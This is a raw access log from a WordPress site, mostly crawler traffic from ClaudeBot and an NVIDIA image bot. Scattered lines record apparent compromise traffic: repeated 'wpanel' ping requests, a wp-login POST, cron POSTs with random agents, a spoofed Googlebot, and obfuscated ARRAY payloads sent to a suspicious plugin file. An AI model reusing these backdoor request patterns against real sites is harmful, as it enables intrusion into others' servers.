216.73.217.117 - - [25/Jul/2026:20:44:08 +0200] "GET /dp/10d0cf1a3275950 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:44:17 +0200] "GET /dp/08a5a7675453813 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:44:27 +0200] "GET /dp/e3391572396937 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:44:37 +0200] "GET /dp/07ec48873482391 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:44:50 +0200] "GET /dp/0cf6b6b65075655 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:45:03 +0200] "GET /dp/531e666a2564075 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:45:13 +0200] "GET /dp/943a680d4625752 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:45:14 +0200] "GET /wp-content/uploads/danmark.gif HTTP/1.1" 200 7643 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:45:23 +0200] "GET /dp/f9906dc74515879 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:45:33 +0200] "GET /dp/b954052d3179443 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:45:39 +0200] "GET /wp-content/uploads/astrid.jpg HTTP/1.1" 200 129798 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
66.198.225.19 - - [25/Jul/2026:20:45:42 +0200] "GET /?wpanel=1&a=ping HTTP/1.1" 200 418 "-" "WPanel/1.0"
216.73.217.117 - - [25/Jul/2026:20:45:43 +0200] "GET /dp/314ff95c3059260 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:45:49 +0200] "GET /wp-content/uploads/Oslo-university-768x512.webp HTTP/1.1" 200 45485 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:45:50 +0200] "GET /wp-content/uploads/11a9a0b9370c8aafe215161a1c4d5f0b_dan-DK_60309.gif HTTP/1.1" 200 5747 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:45:53 +0200] "GET /dp/74ad1dec4734296 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:45:57 +0200] "GET /wp-content/uploads/Tegnebraet-37-tryk.svg HTTP/1.1" 200 1449 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:46:04 +0200] "GET /dp/f2a83e142335664 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:46:19 +0200] "GET /wp-content/uploads/Norrlands-uni-300x169.jpg HTTP/1.1" 200 16229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:46:21 +0200] "GET /dp/594318ea3631941 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:20:46:22 +0200] "POST /wp-cron.php?doing_wp_cron=1785005182.3877511024475097656250 HTTP/1.1" 200 474 "-" "AJHEoI2kYvRr"
104.244.79.40 - - [25/Jul/2026:20:46:09 +0200] "GET /wp-login.php HTTP/2" 200 4363 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
104.244.79.40 - - [25/Jul/2026:20:46:22 +0200] "POST /wp-login.php HTTP/2" 200 4494 "https://nordisk-netvaerk-neurorehab.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
216.73.217.117 - - [25/Jul/2026:20:46:30 +0200] "GET /dp/7b35561a1163372 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:46:45 +0200] "GET /dp/11db85462598518 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:46:46 +0200] "GET /wp-content/uploads/Skaermbillede-2024-11-06-kl.-09.45.09-1-1536x1154.png HTTP/1.1" 200 967825 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:46:54 +0200] "GET /dp/5cfc48673899543 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:47:00 +0200] "GET /wp-content/uploads/primary_charcoal-web.svg HTTP/1.1" 200 14294 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:47:03 +0200] "GET /wp-content/uploads/Sofie.png HTTP/1.1" 200 62738 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:47:05 +0200] "GET /dp/e324b3073873336 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:47:08 +0200] "GET /wp-content/uploads/Sunnaas-Norge-1024x614.jpg HTTP/1.1" 200 84111 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:47:14 +0200] "GET /dp/0d4b31615366140 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:47:26 +0200] "GET /wp-content/uploads/Goeteborg.png HTTP/1.1" 200 604424 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:47:26 +0200] "GET /wp-content/uploads/Linkoebing.png HTTP/1.1" 200 559932 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:47:30 +0200] "GET /dp/b10f89891748191 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
141.98.11.224 - - [25/Jul/2026:20:47:33 +0200] "GET / HTTP/1.0" 200 381 "https://nordisk-netvaerk-neurorehab.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
216.73.217.117 - - [25/Jul/2026:20:47:44 +0200] "GET /dp/940072061727533 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:47:49 +0200] "GET /wp-content/uploads/Skaermbillede-2024-11-06-kl.-09.45.09-1-1024x769.png HTTP/1.1" 200 794501 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:47:53 +0200] "GET /wp-content/uploads/portrettTale-225x300.jpg HTTP/1.1" 200 11771 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:47:54 +0200] "GET /dp/c8c61fbf4082268 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:48:06 +0200] "GET /dp/737c211f3795892 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.198.225.19 - - [25/Jul/2026:20:48:12 +0200] "GET /?wpanel=1&a=ping HTTP/1.1" 200 418 "-" "WPanel/1.0"
216.73.217.117 - - [25/Jul/2026:20:48:16 +0200] "GET /dp/5c7382583744869 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:48:26 +0200] "GET /dp/04e046034523574 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:48:36 +0200] "GET /dp/31003c055559375 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:48:47 +0200] "GET /dp/5c642d224397327 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:48:59 +0200] "GET /dp/7825b9da3436570 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:49:13 +0200] "GET /dp/c33781415653550 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:49:27 +0200] "GET /dp/98645a435222932 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:49:43 +0200] "GET /dp/07a28428508790 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:49:57 +0200] "GET /dp/0a4563794263252 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:50:12 +0200] "GET /dp/f9e911673726023 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:50:16 +0200] "GET /wp-content/uploads/Oslo-university-300x200.webp HTTP/1.1" 200 11041 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:50:23 +0200] "GET /dp/50e16d015012230 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:50:39 +0200] "GET /dp/651575f33011651 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:50:40 +0200] "GET /wp-content/uploads/program-dag-1-768x746-1-300x291.png HTTP/1.1" 200 22494 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:50:40 +0200] "GET /wp-content/uploads/Bodil-Eskesen-Danmark-1536x1024.webp HTTP/1.1" 200 149605 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:50:54 +0200] "GET /dp/3af609471461533 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:51:04 +0200] "GET /dp/abc151722931538 HTTP/2" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:51:22 +0200] "GET /wp-content/uploads/medium-shot-senior-women-pilates-reformer-class-scaled.jpg HTTP/1.1" 200 95990 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:51:24 +0200] "GET /index.php/jk/ HTTP/1.1" 200 184590 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
185.21.40.28 - - [25/Jul/2026:20:51:27 +0200] "GET / HTTP/1.1" 200 185731 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
185.21.40.28 - - [25/Jul/2026:20:51:30 +0200] "GET /robots.txt HTTP/1.1" 200 516 "https://www.google.com" "Mozilla/5.0+(compatible;+Googlebot/2.1;++https://www.google.com/bot.html)"
185.21.40.28 - - [25/Jul/2026:20:51:47 +0200] "POST /wp-cron.php?doing_wp_cron=1785005507.3853149414062500000000 HTTP/1.1" 200 474 "-" "TkDgulAk1MUY"
216.73.217.117 - - [25/Jul/2026:20:51:42 +0200] "GET /dp/e31178e51449438 HTTP/2" 404 12420 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:51:47 +0200] "GET /wp-content/uploads/Angelina-Sergeeva-scaled-e1749108327733-768x648.jpg HTTP/1.1" 200 98247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
156.254.126.126 - - [25/Jul/2026:20:51:38 +0200] "GET /?ARRAY=7o2230223n313738353030393039362p2231223n22687474703n5p2s5p2s7n733938387631332r70756265722r737572665p2s3s6p633q706p687426743q313738353030353439362q3365373263653366636333633438356364356434363236303634326461656537222p2232223n226162366263343965393136313162643162356262633232626462613235663834222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2231322q34302q35312q36342q37352q38382q3239222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/2" 200 18 "https://sl-station.spub.info/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
216.73.217.117 - - [25/Jul/2026:20:52:01 +0200] "GET /dp/be073b693285521 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
156.254.126.126 - - [25/Jul/2026:20:51:21 +0200] "GET /wp-content/plugins/cxreefo/filefuns.php?ARRAY=7o2230223n313738353030393037392p2231223n22687474703n5p2s5p2s7n733938387631332r70756265722r737572665p2s3s6p633q6175746s5s636s646526633q6148523063446s764p33707n4s546734646n457n4p6r4231596q56794p6r4r31636q5976267869616r5s64616r5s6r756q3q3526687474705s686s73743q6r6s726469736o2q6r6574766165726o2q6r6575726s72656861622r636s6q266n633q312668746163636573733q3126726s626s74733q31266175746s5s66696p655s6r616q653q66696p6566756r732r706870266p61695s7975616r3q3026743q313738353030353437392q3136316433633864653132316534323463616565666164666331323834313065222p2232223n226630333563396236326531656266643435376630316462663065336434656530222p2233223n226230376262633334336536623734656638363437613834613434343538353437222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s737973223n7o226175746s5s6o756s5s7n68616r223n2231222p22756r696r7374616p6p223n2231227q7q HTTP/2" 200 601 "https://sl-station.spub.info/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
185.21.40.28 - - [25/Jul/2026:20:52:23 +0200] "POST /wp-cron.php?doing_wp_cron=1785005543.4958500862121582031250 HTTP/1.1" 200 474 "-" "nwsXZm6sJ8SL"
216.73.217.117 - - [25/Jul/2026:20:52:21 +0200] "GET /dp/a022b2261760087 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:20:52:40 +0200] "POST /wp-cron.php?doing_wp_cron=1785005560.0588650703430175781250 HTTP/1.1" 200 474 "-" "dy42KOtzS7sc"
216.73.217.117 - - [25/Jul/2026:20:52:38 +0200] "GET /dp/1d43d2752350504 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:52:47 +0200] "GET /wp-content/uploads/Norge.png HTTP/1.1" 200 2965 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:52:48 +0200] "GET /wp-content/uploads/Skaermbillede-2024-11-06-kl.-09.45.09-1-300x225.png HTTP/1.1" 200 105029 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:53:03 +0200] "GET /dp/c54253b94977606 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
185.21.40.28 - - [25/Jul/2026:20:53:32 +0200] "POST /wp-cron.php?doing_wp_cron=1785005612.0398890972137451171875 HTTP/1.1" 200 474 "-" "OnLvgeHrMe9M"
216.73.217.117 - - [25/Jul/2026:20:53:31 +0200] "GET /dp/8629d350513231 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:53:39 +0200] "GET /wp-content/uploads/Linkoebing-300x169.png HTTP/1.1" 200 37798 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:53:46 +0200] "GET /dp/42da44915302039 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.198.225.19 - - [25/Jul/2026:20:53:50 +0200] "GET /?wpanel=1&a=ping HTTP/1.1" 200 905 "-" "WPanel/1.0"
216.73.217.117 - - [25/Jul/2026:20:54:00 +0200] "GET /dp/31d00f4e291454 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.217.117 - - [25/Jul/2026:20:54:10 +0200] "GET /dp/00cc2f5c615140 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:54:20 +0200] "GET /wp-content/uploads/HN_Jesper-Just-Fabricius_DSC4592_20cm-682x1024.jpg HTTP/1.1" 200 52000 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:54:24 +0200] "POST /wp-cron.php?doing_wp_cron=1785005664.2938549518585205078125 HTTP/1.1" 200 474 "-" "ue2WSGdYBNMo"
216.73.217.117 - - [25/Jul/2026:20:54:22 +0200] "GET /dp/3a96c548993288 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:54:30 +0200] "GET /wp-content/uploads/Sunnaas-Norge-300x180.jpg HTTP/1.1" 200 22583 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:54:32 +0200] "GET /wp-content/uploads/Angelina-Sergeeva-scaled-e1749108327733-300x253.jpg HTTP/1.1" 200 60076 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:54:34 +0200] "POST /wp-cron.php?doing_wp_cron=1785005674.2232279777526855468750 HTTP/1.1" 200 474 "-" "3wlF6eM4YQLj"
216.73.217.117 - - [25/Jul/2026:20:54:32 +0200] "GET /dp/213b053a1069187 HTTP/2" 404 12541 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:54:34 +0200] "GET /wp-content/uploads/Bodil-Eskesen-Danmark.webp HTTP/1.1" 200 290989 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:54:46 +0200] "GET /wp-content/uploads/HN_Jesper-Just-Fabricius_DSC4592_20cm-scaled.jpg HTTP/1.1" 200 108578 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
185.21.40.28 - - [25/Jul/2026:20:54:48 +0200] "POST /wp-cron.php?doing_wp_cron=1785005688.3768360614776611328125 HTTP/1.1" 200 474 "-" "5JeHc69kSj6P"
216.73.217.117 - - [25/Jul/2026:20:54:46 +0200] "GET /dp/35f4e2384514922 HTTP/2" 404 12526 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
54.165.162.167 - - [25/Jul/2026:20:54:50 +0200] "GET /wp-content/uploads/Goeteborg-768x507.png HTTP/1.1" 200 279038 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
54.165.162.167 - - [25/Jul/2026:20:54:56 +0200] "GET /wp-content/uploads/portrettTale-scaled.jpg HTTP/1.1" 200 76424 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0 (compatible; [nvidia]-[psirt@nvidia.com]-[nspect-i05s-fieu]-[nvidiabot]; +https://github.com/rom1504/img2dataset)"
216.73.217.117 - - [25/Jul/2026:20:54:56 +0200] "GET /dp/3c705b904648024 HTTP/2" 404 12540 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
